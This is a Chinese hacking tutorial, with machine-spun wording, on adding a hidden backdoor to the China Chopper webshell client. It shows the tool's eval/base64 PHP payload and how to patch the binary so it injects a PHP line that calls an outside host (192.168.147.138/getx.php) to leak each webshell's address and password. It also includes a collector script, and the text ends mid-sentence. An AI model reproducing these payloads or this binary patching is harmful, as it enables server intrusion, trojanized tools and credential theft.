中国菜刀隐蔽门

中国菜刀,无需再多,是大多数黑阔常常应用的小工具,实际使用说明,在网上有许多实例教程,这儿我讲下怎样给菜刀加上隐蔽工程侧门。

 

 

1、侧门怎样开启

这儿要先讲下菜刀的侧门是怎样开启的,了解怎样开启侧门,后边按这一构思向下看着便捷些。

当一段话连回总体目标服务器时,人们常常会在文件列表中鼠标右键查询文档,给出图

中国菜刀

中国菜刀

当你实行鼠标右键-编写文档时,人们的侧门就会被开启(人们要加上的就这样的1个掩藏侧门)。

2、菜刀蜕壳

在剖析菜刀前,先把菜刀的壳脱下,应用Peid所知,菜刀是UPx壳,在网上找个Upx的脱壳工具就能蜕壳。

3、查询数据文件,剖析步骤(鼠标右键-编写)

当地构建好自然环境后,在菜刀中鼠标右键-编写查询某一文档,应用burpsuite开展抓包,

统计数据给出

a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=QzpcXHdhbXBcXHd3d1xccm9ib3RzLnR4dA%3D%3D

总共有3个主要参数,

a url编解码后为@eval (base64_decode($_POST[z0]));

z0先url编解码,在base64编解码为

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();

Z1先url编解码,在base64编解码为

C:wampwwwrobots.txt

略微了解php的人应当可以看出去,这些编码就是说1个读文档的php脚本制作,由菜刀发送至总体目标网络服务器上,随后在总体目标网络服务器上实行的。 即然编码做为字符串上传带总体目标网络服务器上,那么我人们能够再字符串上加上人们想实行的编码,由菜刀一块儿上传以往实行。

if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

假如人们将上这些编码做为字符串,发送至服务器端实行,人们就能得到webshell的详细地址和登陆密码。

4、应用OD剖析

应用OD开启中国菜刀,鼠标右键检索字符串,結果给出:

精准定位到php载入文的字符串处,点一下进来到编码处

所知,程序流程时将其做为字符串,压进栈中做为主要参数被事件涵数解决的,假如在这些字符串后加入团队的侧门编码,就会被程序流程一块儿发送至服务器端实行。

5、改动菜刀程序文件

由上所知,字符串的详细地址为0x49ba94,查看内存统计数据,

发觉其后边早已被他字符串占有(立即查询原二进制文件結果都是这般),假如人们强制性在后边加上侧门字符串,就会毁坏远程控制的一些內容。因而人们必须另一个找1个空余的大容量,将侧门编码放到这里。

这儿人们选择详细地址4841d0h的室内空间,转换为文档偏位即是841d0h。

将侧门字符串

$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

放进文档841d0处

开启010editor 将所述字符串拷贝到010editor中,

因为程序流程中的字符串是双字节数储放的,这儿人们必须将侧门编码也转换为双字节数的。010ditor-小工具-变换

应用010editor开启菜刀程序流程,跳至841d0h偏位处,将变换后的字符串遮盖替换成菜刀程序流程中同样尺寸的统计数据长短,

储存文档,那样侧门字符串就被人们加上到程序流程中了。

6、应用OD改动编程代码

用OD开启菜刀程序流程,精准定位到第4步中字符串入栈的编码处 push 0049bae4。

0049bae4详细地址是改动前字符串的部位,如今人们将其改为人们加上的字符串的地质学处,字符串文档偏位为841d0h,转换运行内存偏位为4841d0h,编码改动给出

储存改动的文档就能。

7、检测改动結果

改动文档后,人们在看一下菜刀-鼠标右键编写,捉到数据文件

Z0破译后为

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));};echo("|<-");die();

看得见人们的侧门编码也一块儿被发送至服务器端实行了。

撰写加单的getx.php接受結果,

getx.php:

$getx = $_GET["caidao"]; 

$file = fopen("getx.txt","a+");

fwrite($file,$getx);

fwrite($file,"rn");

fclose($file);

?>

結果给出:

8、后记

根据检测所知,针对asp,aspx跟php侧门的加上类似,能够保持。Jsp木马病毒方式不同,保持加上侧门比较艰难。另一个,因为侧门是在服务器端实行的,因此不易被发觉,当地抓